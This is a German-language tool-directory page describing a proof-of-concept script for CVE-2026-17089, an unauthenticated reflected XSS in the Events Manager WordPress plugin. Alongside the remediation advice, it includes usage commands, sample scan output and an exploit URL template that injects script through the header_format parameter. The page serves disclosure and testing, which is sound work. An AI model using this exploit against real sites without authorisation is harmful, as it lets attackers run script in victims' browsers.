Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-17089-PoC-pwnVader — Shell-PoC für CVE-2026-17089, eine unauthentifizierte reflektierte XSS-Schwachstelle im WordPress-Plugin Events Manager (<= 7.4.0.1); fingerprintet das Plugin und testet die header_format-Reflexion. | Kitploit
Tools/GitHubGitHub/pwnvader/cve-2026-17089-poc-pwnvader
SchwachstellenscannerWeb-SchwachstellenscannerSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungWebsicherheitPenetrationstests
GitHubpwnvader/cve-2026-17089-poc-pwnvader

CVE-2026-17089-PoC-pwnVader

Shell-PoC für CVE-2026-17089, eine unauthentifizierte reflektierte XSS-Schwachstelle im WordPress-Plugin Events Manager (<= 7.4.0.1); fingerprintet das Plugin und testet die header_format-Reflexion.

Repository anzeigen
6vor 10 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-17089 — Events Manager <= 7.4.0.1 — Unauthentifizierte reflektierte XSS (header_format)

Autor: pwnVader · Lizenz: MIT (Repository-Stammverzeichnis)

KomponenteEvents Manager – Calendar, Bookings, Tickets, and more! (WordPress-Plugin)
TypCWE-79 — Reflektierte Cross-Site-Scripting
Betroffen<= 7.4.0.1
Behobenspätere 7.4.x-Version (wp_kses_post() angewendet in EM_Events::output_grouped())
CVECVE-2026-17089 — CVSS 3.1 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
PoCpoc.sh

Zusammenfassung

Der Shortcode-Einstiegspunkt bereinigt header_format mit wp_kses(), aber die unauthentifizierte AJAX-Aktion search_events_grouped umgeht diese Bereinigung und gibt den Wert in die HTML-Antwort aus (EM_Events::output_grouped()). Ein entfernter, unauthentifizierter Angreifer kann eine URL erstellen, die beliebiges JavaScript im Origin der betroffenen Website für jeden Benutzer ausführt, der sie öffnet (UI:R).

Verwendung

# Interactive menu
./poc.sh

# Read-only: fingerprint the plugin and test the unescaped reflection
./poc.sh check --target https://example.com

# Print the exploit URL (open it in a browser; the script runs in the target origin)
./poc.sh url --target https://example.com --payload "alert(document.domain)"

Beispielausgabe (check)

== CVE-2026-17089 PoC (check) ==
target: https://example.com

[1] Plugin fingerprint (read-only)
  [PASS] Events Manager assets are served (plugin installed)
  [info] Stable tag: 7.1.7
  [PASS] version 7.1.7 is in the affected range (<= 7.4.0.1)

[2] Unauthenticated reflection test (read-only, benign marker)
  [PASS] endpoint reflected header_format UNESCAPED (the raw  is in the response)

== RESULT: 3 PASS / 0 FAIL ==
VULNERABLE to CVE-2026-17089 (unauthenticated reflected XSS).

Exploit-URL

https://example.com/wp-admin/admin-ajax.php?action=search_events_grouped&scope=all&limit=5&header_format=<urlencoded payload>

Erkennungslogik

  1. Fingerprinting: readme.txt (Stable tag) und/oder der Plugin-Asset-Pfad /wp-content/plugins/events-manager/includes/js/events-manager.js.
  2. Senden eines harmlosen Markers (``) an admin-ajax.php?action=search_events_grouped mit header_format auf den Marker gesetzt und Prüfen, ob das rohe Markup unescaped im Antwort-Body reflektiert wird.

Behebung

  • Aktualisieren Sie Events Manager auf die aktuelle Version (der Fix wendet wp_kses_post() auf header_format innerhalb der Rendering-Funktion an und deckt damit jeden Aufrufer ab).
  • Übergangslösung: Blockieren Sie die unauthentifizierte search_events_grouped AJAX-Aktion oder filtern Sie header_format auf WAF-/Anwendungsebene.

Referenzen

  • NVD — CVE-2026-17089: https://nvd.nist.gov/vuln/detail/CVE-2026-17089
  • GitHub Advisory: https://github.com/advisories/GHSA-gg76-jx66-hjq8

Haftungsausschluss

Nur für autorisierte Sicherheitstests. Der PoC ist read-only (check) oder gibt eine URL aus (url); es werden keine Daten verändert.

Tool herunterladen